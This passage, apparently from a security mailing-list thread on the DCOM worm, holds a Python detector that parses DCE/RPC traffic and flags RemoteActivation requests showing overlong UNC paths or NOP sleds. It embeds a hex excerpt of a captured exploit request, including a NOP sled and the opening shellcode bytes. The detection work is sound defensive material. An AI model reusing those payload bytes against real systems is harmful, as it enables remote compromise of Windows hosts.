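    bytes.fromhex("0500000310000000a8060000e5000000" "9006000001000400")
    + bytes.fromhex("00005c005c00460058004e0042004600"
                    "5800460058004e004200460058004600"
                    "580046005800460058009d130001cce0"
                    "fd7fcce0fd7f")
    + b"\x90" * 167                                   # 0x3D6 .. 0x47C in the dump
    + bytes.fromhex("eb195e31c981e989ffffff813680bf32"))  # first shellcode bytes


def parse_header(data):
    """Common 16-byte c/o header: version, ptype, flags, drep, frag/auth length, call id."""
    if len(data) < 16:
        raise ValueError("short PDU")
    ver, minor, ptype, flags, _drep, frag_len, auth_len, call_id = struct.unpack_from("<BBBB4sHHI", data)
    if ver != 5:
        raise ValueError("not a DCE/RPC v5 PDU")
    return {"ptype": ptype, "flags": flags, "frag_len": frag_len,
            "auth_len": auth_len, "call_id": call_id, "minor": minor}


def parse_bind(data):
    """Return (header, {ctx_id: (abstract_uuid, abstract_ver, [(transfer_uuid, ver), ...])})."""
    hdr = parse_header(data)
    max_xmit, max_recv, assoc, n_ctx = struct.unpack_from("<HHIB", data, 16)
    hdr.update(max_xmit=max_xmit, max_recv=max_recv, assoc_group=assoc)
    off, contexts = 28, {}
    for _ in range(n_ctx):
        ctx_id, n_ts = struct.unpack_from("<HB", data, off)
        abstract = uuid.UUID(bytes_le=data[off + 4:off + 20])
        abstract_ver, = struct.unpack_from("<I", data, off + 20)
        off += 24
        syntaxes = []
        for _ in range(n_ts):
            syntaxes.append((uuid.UUID(bytes_le=data[off:off + 16]),
                             struct.unpack_from("<I", data, off + 16)[0]))
            off += 20
        contexts[ctx_id] = (abstract, abstract_ver, syntaxes)
    return hdr, contexts


def parse_request(data):
    """Header plus allocation hint, presentation context id, opnum and stub bytes."""
    req = parse_header(data)
    alloc_hint, ctx_id, opnum = struct.unpack_from("<IHH", data, 16)
    off = 24 + (16 if req["flags"] & PFC_OBJECT_UUID else 0)
    req.update(alloc_hint=alloc_hint, ctx_id=ctx_id, opnum=opnum,
               stub=data[off:req["frag_len"] - req["auth_len"]],
               truncated=len(data) < req["frag_len"])
    return req


def unc_names(stub):
    """Find UTF-16LE strings that start with two backslashes; return (offset, text, NUL-terminated)."""
    out, pos = [], 0
    while True:
        i = stub.find(b"\\\x00\\\x00", pos)
        if i < 0:
            return out
        j = i + 4
        while j + 1 < len(stub) and stub[j + 1] == 0 and 0x20 <= stub[j] < 0x7F:
            j += 2                                     # printable ASCII code unit
        out.append((i, "\\\\" + stub[i + 4:j].decode("utf-16-le"), stub[j:j + 2] == b"\x00\x00"))
        pos = j


def longest_nop_sled(stub):
    best = run = 0
    for b in stub:
        run = run + 1 if b == 0x90 else 0
        best = max(best, run)
    return best


def analyze(pdus):
    """Walk client PDUs in order, resolve each request's interface via the bind
    that preceded it, and flag RemoteActivation calls that look like the capture."""
    contexts, findings = {}, []
    for pdu in pdus:
        ptype = parse_header(pdu)["ptype"]
        if ptype == PTYPE_BIND:
            contexts.update(parse_bind(pdu)[1])
        elif ptype == PTYPE_REQUEST:
            req = parse_request(pdu)
            iface = contexts.get(req["ctx_id"], (None,))[0]
            if iface != ISYSTEM_ACTIVATOR or req["opnum"] != OPNUM_REMOTE_ACTIVATION:
                continue
            names = unc_names(req["stub"])
            sled = longest_nop_sled(req["stub"])
            if any(not ok for _, _, ok in names) or sled >= NOP_SLED_THRESHOLD:
                findings.append({"call_id": req["call_id"], "unc": names,
                                 "nop_sled": sled, "truncated": req["truncated"]})
    return findings


if __name__ == "__main__":
    for finding in analyze([BIND_PDU, REQUEST_PDU_EXCERPT]):
        print(finding)
```

Two things the trace makes visible that the parser relies on: the request PDU does not name its interface, only a context id, so a detector has to remember the bind (a request seen without its bind is not flagged here), and the fragment length in the request header (1704) exceeds the first TCP segment (1360), so a real sensor must reassemble the stream before applying the stub checks rather than inspect single packets.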
Current thread:
- DCOM Paul Marsh (Aug 11)
- <Possible follow-ups>
- DCOM Paul Marsh (Aug 11)
- DCOM Worm released Joey (Aug 11)
- Re: DCOM Worm released Dennis Opacki (Aug 11)
- Re: DCOM Worm released Dennis Opacki (Aug 11)
- Re: DCOM Worm released Jordan Wiens (Aug 11)
- RE: DCOM Worm released Marc Maiffret (Aug 11)
- Re: DCOM Worm released daniel uriah clemens (Aug 11)
- RE: DCOM Worm released gml (Aug 11)
- DCOM Worm released Joey (Aug 11)
- Re: DCOM Worm released Nils (Aug 11)